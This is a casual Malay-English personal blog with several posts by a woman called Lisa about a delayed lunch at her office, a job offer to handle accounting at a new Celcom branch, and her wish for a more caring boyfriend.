Time untuk lunch?  Dah late sangat sangat kan?  bissy ramai customer atau banyak kerja?  tidak!  Hari ini tak ramai customer,  kerja pon semua dah settle tapi aku lambat makan tengah hari sebab Boss kuar ade hal. Anak dia pon keluar. Huh!  memang lah ada staff lain di office ni. Tapi dia staff baru,  jadi saya dengan amat sangat terpaksa kena duduk dalam office ni. Perut dah menari nari dari tadi.
Hurm.. Sabar je lah. Sabar sebab terpaksa. Akhir akhir ini pon gastrik lisa dah selalu kambuh. Nak wat macam mane lagi.   Tadi boss time dah balik office dia cakap suruh lisa pergi Taman intan.  office cawangan satu ag. Then dengan muka tak syok lisa terus jawap. "sorry i want take my lunch first. I'm hungry" then main blah macam tu je. Sakit hati.. Dah tentu belom makan lagi.. Ish..tanya lah dah makan ke hape. Ini tidak, Terus suruh g taman intan. 

Laparrr.... Sekarang lisa berada di kedai makan. Tengah order NASI PUTIH daging black paper. Makanan pebret tu.  Eh.... Lambat pulak makcik nie.  huhuhu. ... Laparrrrrrrrrrrr! Arghhhh....

Selamat Pagi

Assalamualaikum, selamat pagi! Hey... Nampak Excited je kan. Excited sebab semalam dapat panggilan kerja baru. Dah bosan dengan kerja yang lama ke? oh tidak! saya suka and sayang kerja saya yg sekarang ni. Kerja celcom memang menyeronokkan. Sometimes boleh lah rileks...tapi kalau dah sampai masa accounting, sakit kepala woo. Back to the topik, sape yang call saya? General Manager call saya. Dia cakap dia nak buka cawangan celcom di satu tempat. Dia nak minta lisa jadi accounting je.. Bukan promoter. Jadi Lisa yang handle office baru tu. Terima ke tak eah?
Published with Blogger-droid v2.0.9
Wednesday, January 2, 2013

Apa yang wanita nak ?

Apa yang seorang wanita inginkan dari pasangannya ?

Sebenarnya senang je , seorang "Wanita" bukan inginkan smartphone yang mahal..Baju yang mahal.. berjalan-jalan ke tempat-tempat mahal..tapi..cukup hanya dengan kasih sayang atau caring terhadap sigadis tu . 
Ye lah.. kalau just tittle "pasangan" tapi masa untuk kekasih tu tak ada? macam tak de pasangan je kan,,

ye lah,,Tahun lepas.. eceh tahun lepas lah ye, macam lah lama sangat kan. OKayh.. ye memang pengalaman dalam hidup Lisa . si "DIA " ade banyak masa untuk SKYPE dengan kawan-kawan dia , tapi untuk meluangkan masa dengan saya ? xde . Hurm ... bukan tak ada tapi dari 8 jam dia yang terluang, dia lebih banyak menghabiskan masa dengan kawan kawan dia. Masa untuk saya ? just bagi 2 @ 3 SMS je . hurm.. Kalau kalian ada dalam posisi saya apa yang kalian rasa ? Sedih kan ?  bak tajuk lagu " kekasih yang tak dianggap" haa.... lebih kurang lah ye .

Eh ,,, Bukan saya yang terlebih akan tetapi saya hanya ingin dia caring je dengan saya . Urm.. Tak nak tegur , sebab elak gaduh . sebab Lisa pon lebih suka berdiam diri. Tak pe lah, Lisa pon beralihlah ke FB,Twitter, Men game POOL kat FB... dengan kawan lisa si LEEZ . Dulu dia tak pernah main game nie.. then Lisa suruh dia try , eh... dia ketagih maen game ini . hehehhee

Tahun ini dah tak nak ada BF lagi :) azam tahun ini. Focus kerja , Yeah... Balik kerja terus tidur. Bukan ada nak message pon, call pon bukan ada nak call lisa (bunyi macam sedih je .. hahahaha )  tak de lah. memang tidur awal bagus untuk kesehatan . kan.. kan... kan... ? :P

Okayh,,, i need to rest Now.. sambung malam nanti ya kalau terjaga dari tidur . :) Gud nyte... sweet Dream ^_^


Whatsapp Button works on Mobile Device only

Start typing and press Enter to search